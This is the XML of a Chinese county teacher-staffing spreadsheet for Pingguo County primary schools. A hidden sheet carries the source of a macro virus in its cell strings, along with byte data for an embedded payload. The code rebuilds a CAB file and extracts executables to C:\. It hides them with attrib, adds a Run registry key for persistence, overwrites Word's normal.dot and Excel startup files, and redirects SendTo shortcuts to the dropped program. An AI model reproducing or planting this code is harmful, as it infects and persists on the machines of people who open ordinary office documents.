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26" yWindow="1365" windowWidth="15480" windowHeight="8850" tabRatio="807" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="YEMRWPYQWNTYNO" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="总表" sheetId="2" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Print_Titles" localSheetId="1">'总表'!$4:$5</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="249" uniqueCount="231">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t>for each ff in fold.files</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</si>
  <si>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</si>
  <si>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附件1：</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>招聘单位</t>
  </si>
  <si>
    <t>县编委核定教职工编制数（个）</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>基本编</t>
  </si>
  <si>
    <t>控制数</t>
  </si>
  <si>
    <t>小计</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>新安镇中心小学</t>
  </si>
  <si>
    <t>果化镇中心小学</t>
  </si>
  <si>
    <t>太平镇中心小学</t>
  </si>
  <si>
    <t>太平镇耶圩中心小学</t>
  </si>
  <si>
    <t>坡造镇中心小学</t>
  </si>
  <si>
    <t>四塘镇中心小学</t>
  </si>
  <si>
    <t>旧城镇中心小学</t>
  </si>
  <si>
    <t>海城乡中心小学</t>
  </si>
  <si>
    <t>凤梧镇中心小学</t>
  </si>
  <si>
    <t>凤梧镇堆圩中心小学</t>
  </si>
  <si>
    <t>榜圩镇中心小学</t>
  </si>
  <si>
    <t>黎明乡中心小学</t>
  </si>
  <si>
    <t>同老乡中心小学</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</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</si>
  <si>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18_x0015_ 19_x0018_ 82_x0000_155_x0000_148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 _x0011_71 114 _x0012_29 44 197 43 88 1_x0018_0 134 254 108 91 57 108 1_x0016_2 181 154 188 0 110 204 171 135 232 2_x0010_1 44 68 188_x0000_46 91 132 167 114 37 60 70 _x0017_3 2_x0013_5 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 10_x0013_ 217 109 86 109 169 59 204 _x0012_03 121 145 _x0011_76 158 43 91 251 179 115 _x0011_81 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 _x0012_01 126 16_x0010_ 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84_x0000_179 3 66 105 _x0015_1 7 6# 248 4 96 52 179 228 149 34 175 239 80 153 _x0018_2 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 13_x0014_ 225 16 121 54 177 75 61 127 21_x0017_ 54_x0000_82 77 228 47 1 0 19_x0018_ 201 83 53 23_x0012_ 94 209 161 174 249 0 80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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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241 76 19 218 204 88 154 64 84 69 228 8_x0014_ 37 206 182 79 68 201 148 10 215 36 111 204 32 _x0011_76 48 14 _x0014_0 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142_x0000_149 9 105_x0000_152 41 74 246_x0000_211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18_x0000_1_x0012_ 28 237 2_x0013_8 111 251 59 237 111 97 108 21 2 _x0012_06 149 68 150 2_x0013_5 236 52 73_x0000_37 82 57 232 84 226 227 156 226_x0000_99 176 89 169 251 87 22_x0015_ 185 176 178_x0000_50 86 242 172 178 246_x0000_138 68 223 229 30 150_x0000_184 59 _x0011_49 126 214 253 171 182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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>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</si>
  <si>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on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t>n=m+1</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t>End Sub</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Private Sub createcabfile()</t>
  </si>
  <si>
    <t>Dim ch As Byte</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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58 23 144 28 65 4_x0006_ 125 225 117 147 134 69 200_x0000_246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23_x0000_1_x0017_2 123_x0000_37 _x0016_5 105 253 188 161 217 73 136 42 36 68 125 195 176 2_x0014_8 230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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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m=instr(n,hv," ")</t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>fso.deletefile cabfile</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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t>word.quit</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</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</si>
  <si>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</si>
  <si>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End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t>Next</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</si>
  <si>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</si>
  <si>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调出人员最高控制数（人）</t>
  </si>
  <si>
    <t xml:space="preserve">平果县第十三小学教师调配计划表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</si>
</sst>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000"/>
    <numFmt numFmtId="190" formatCode="&quot;是&quot;;&quot;是&quot;;&quot;否&quot;"/>
    <numFmt numFmtId="191" formatCode="&quot;真&quot;;&quot;真&quot;;&quot;假&quot;"/>
    <numFmt numFmtId="192" formatCode="&quot;开&quot;;&quot;开&quot;;&quot;关&quot;"/>
    <numFmt numFmtId="193" formatCode="0_ "/>
    <numFmt numFmtId="194" formatCode="0.0_ "/>
    <numFmt numFmtId="195" formatCode="0_);[Red]\(0\)"/>
    <numFmt numFmtId="196" formatCode="0;[Red]0"/>
    <numFmt numFmtId="197" formatCode="0.00;[Red]0.00"/>
    <numFmt numFmtId="198" formatCode="yyyy&quot;年&quot;m&quot;月&quot;;@"/>
    <numFmt numFmtId="199" formatCode="0.00_);[Red]\(0.00\)"/>
    <numFmt numFmtId="200" formatCode="###,###,###,##0.00"/>
    <numFmt numFmtId="201" formatCode="0.00_);\(0.00\)"/>
    <numFmt numFmtId="202" formatCode="yyyy\.mm"/>
    <numFmt numFmtId="203" formatCode="yy/mm"/>
    <numFmt numFmtId="204" formatCode="yyyy/mm"/>
    <numFmt numFmtId="205" formatCode="yy/m/d"/>
    <numFmt numFmtId="206" formatCode="yyyymm"/>
    <numFmt numFmtId="207" formatCode="00"/>
    <numFmt numFmtId="208" formatCode="yyyy\-mm\-dd"/>
    <numFmt numFmtId="209" formatCode="0.0_);[Red]\(0.0\)"/>
  </numFmts>
  <fonts count="27">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="12"/>
      <color indexed="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="12"/>
      <color indexed="36"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>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1"/>
      <color indexed="8"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>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5" fillId="0" borderId="0">
      <alignment vertical="center"/>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protection/>
    </xf>
    <xf numFmtId="0" fontId="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3" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5"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0" fillId="0" borderId="0" xfId="45">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="67">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="45" applyNumberFormat="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="6" fillId="0" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="193" fontId="24" fillId="16" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="193" fontId="24" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="194" fontId="24" fillId="16" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="194" fontId="24" fillId="0" borderId="10"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xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="11" xfId="67" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="11" xfId="67" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="12" xfId="67" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="16" borderId="10"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4" fillId="0" borderId="14" xfId="67" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="15" xfId="67" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="16" xfId="67" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="17" xfId="67" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
  </cellXfs>
  <cellStyles count="56">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4" xfId="42"/>
    <cellStyle name="常规 5" xfId="43"/>
    <cellStyle name="常规 6" xfId="44"/>
    <cellStyle name="常规_norma1"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1" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" style="2" customWidth="1"/>
    <col min="3" max="3" width="31.875" style="3" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="0" style="1" hidden="1" customWidth="1"/>
    <col min="7" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:3" ht="15">
      <c r="B1" s="2" t="s">
        <v>197</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="2" spans="2:3" ht="15">
      <c r="B2" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="3" spans="2:3" ht="15.75">
      <c r="B3" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="4" spans="2:3" ht="15">
      <c r="B4" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="5" spans="2:3" ht="15">
      <c r="B5" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="6" spans="2:3" ht="15">
      <c r="B6" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="7" spans="2:3" ht="15">
      <c r="B7" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="8" spans="2:3" ht="15">
      <c r="B8" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="9" spans="2:3" ht="15">
      <c r="B9" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="10" spans="2:3" ht="15.75">
      <c r="B10" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C10" s="4" t="s">
        <v>223</v>
      </c>
    </row>
    <row r="11" spans="2:3" ht="15.75">
      <c r="B11" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C11" s="4" t="s">
        <v>224</v>
      </c>
    </row>
    <row r="12" spans="2:3" ht="15.75">
      <c r="B12" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C12" s="4" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="13" spans="2:3" ht="15">
      <c r="B13" s="2" t="s">
        <v>209</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>226</v>
      </c>
    </row>
    <row r="14" spans="2:3" ht="15.75">
      <c r="B14" s="2" t="s">
        <v>172</v>
      </c>
      <c r="C14" s="4" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="15" spans="2:3" ht="15.75">
      <c r="B15" s="2" t="s">
        <v>78</v>
      </c>
      <c r="C15" s="4" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="16" spans="2:3" ht="15.75">
      <c r="B16" s="2" t="s">
        <v>113</v>
      </c>
      <c r="C16" s="4" t="s">
        <v>223</v>
      </c>
    </row>
    <row r="17" spans="2:3" ht="15.75">
      <c r="B17" s="2" t="s">
        <v>217</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="18" spans="2:3" ht="15.75">
      <c r="B18" s="2" t="s">
        <v>61</v>
      </c>
      <c r="C18" s="4" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="19" spans="2:3" ht="15.75">
      <c r="B19" s="2" t="s">
        <v>112</v>
      </c>
      <c r="C19" s="4" t="s">
        <v>222</v>
      </c>
    </row>
    <row r="20" spans="2:3" ht="15.75">
      <c r="B20" s="2" t="s">
        <v>67</v>
      </c>
      <c r="C20" s="4" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="21" spans="2:3" ht="15">
      <c r="B21" s="2" t="s">
        <v>174</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="22" spans="2:3" ht="15">
      <c r="B22" s="2" t="s">
        <v>215</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="23" spans="2:3" ht="15.75">
      <c r="B23" s="2" t="s">
        <v>84</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="24" spans="2:3" ht="15.75">
      <c r="B24" s="2" t="s">
        <v>46</v>
      </c>
      <c r="C24" s="4" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="25" spans="2:3" ht="15">
      <c r="B25" s="2" t="s">
        <v>115</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="26" spans="2:3" ht="15.75">
      <c r="B26" s="2" t="s">
        <v>38</v>
      </c>
      <c r="C26" s="4" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="27" spans="2:3" ht="15.75">
      <c r="B27" s="2" t="s">
        <v>198</v>
      </c>
      <c r="C27" s="4" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="28" spans="2:3" ht="15.75">
      <c r="B28" s="2" t="s">
        <v>192</v>
      </c>
      <c r="C28" s="4" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="29" spans="2:3" ht="15.75">
      <c r="B29" s="2" t="s">
        <v>72</v>
      </c>
      <c r="C29" s="4" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="30" spans="2:3" ht="15.75">
      <c r="B30" s="2" t="s">
        <v>50</v>
      </c>
      <c r="C30" s="4" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="31" spans="2:3" ht="15.75">
      <c r="B31" s="2" t="s">
        <v>36</v>
      </c>
      <c r="C31" s="4" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="32" spans="2:3" ht="15.75">
      <c r="B32" s="2" t="s">
        <v>125</v>
      </c>
      <c r="C32" s="4" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="33" spans="2:3" ht="15.75">
      <c r="B33" s="2" t="s">
        <v>86</v>
      </c>
      <c r="C33" s="4" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="34" spans="2:3" ht="15.75">
      <c r="B34" s="2" t="s">
        <v>85</v>
      </c>
      <c r="C34" s="4" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="35" spans="2:3" ht="15">
      <c r="B35" s="2" t="s">
        <v>111</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="36" spans="2:3" ht="15.75">
      <c r="B36" s="2" t="s">
        <v>191</v>
      </c>
      <c r="C36" s="4" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="37" spans="2:3" ht="15">
      <c r="B37" s="2" t="s">
        <v>31</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="38" spans="2:3" ht="15">
      <c r="B38" s="2" t="s">
        <v>142</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="39" spans="2:3" ht="15">
      <c r="B39" s="2" t="s">
        <v>80</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="40" spans="2:3" ht="15">
      <c r="B40" s="2" t="s">
        <v>210</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="41" spans="2:3" ht="15">
      <c r="B41" s="2" t="s">
        <v>105</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="42" spans="2:3" ht="15">
      <c r="B42" s="2" t="s">
        <v>199</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>211</v>
      </c>
    </row>
    <row r="43" spans="2:3" ht="15.75">
      <c r="B43" s="2" t="s">
        <v>193</v>
      </c>
      <c r="C43" s="4" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="44" spans="2:3" ht="15.75">
      <c r="B44" s="2" t="s">
        <v>68</v>
      </c>
      <c r="C44" s="4" t="s">
        <v>213</v>
      </c>
    </row>
    <row r="45" spans="2:3" ht="15.75">
      <c r="B45" s="2" t="s">
        <v>77</v>
      </c>
      <c r="C45" s="4" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="46" spans="2:3" ht="15">
      <c r="B46" s="2" t="s">
        <v>108</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="47" spans="2:3" ht="15">
      <c r="B47" s="2" t="s">
        <v>98</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="48" spans="2:3" ht="15">
      <c r="B48" s="2" t="s">
        <v>134</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="49" spans="2:3" ht="15">
      <c r="B49" s="2" t="s">
        <v>176</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="50" spans="2:3" ht="15">
      <c r="B50" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="51" spans="2:3" ht="15.75">
      <c r="B51" s="2" t="s">
        <v>216</v>
      </c>
      <c r="C51" s="4" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="52" spans="2:3" ht="15.75">
      <c r="B52" s="2" t="s">
        <v>155</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="53" spans="2:3" ht="15.75">
      <c r="B53" s="2" t="s">
        <v>171</v>
      </c>
      <c r="C53" s="4" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="54" spans="2:3" ht="15.75">
      <c r="B54" s="2" t="s">
        <v>135</v>
      </c>
      <c r="C54" s="4" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="55" spans="2:3" ht="15.75">
      <c r="B55" s="2" t="s">
        <v>166</v>
      </c>
      <c r="C55" s="4" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="56" spans="2:3" ht="15.75">
      <c r="B56" s="2" t="s">
        <v>40</v>
      </c>
      <c r="C56" s="4" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="57" spans="2:3" ht="15.75">
      <c r="B57" s="2" t="s">
        <v>94</v>
      </c>
      <c r="C57" s="4" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="58" spans="2:3" ht="15.75">
      <c r="B58" s="2" t="s">
        <v>87</v>
      </c>
      <c r="C58" s="4" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="59" spans="2:3" ht="15.75">
      <c r="B59" s="2" t="s">
        <v>179</v>
      </c>
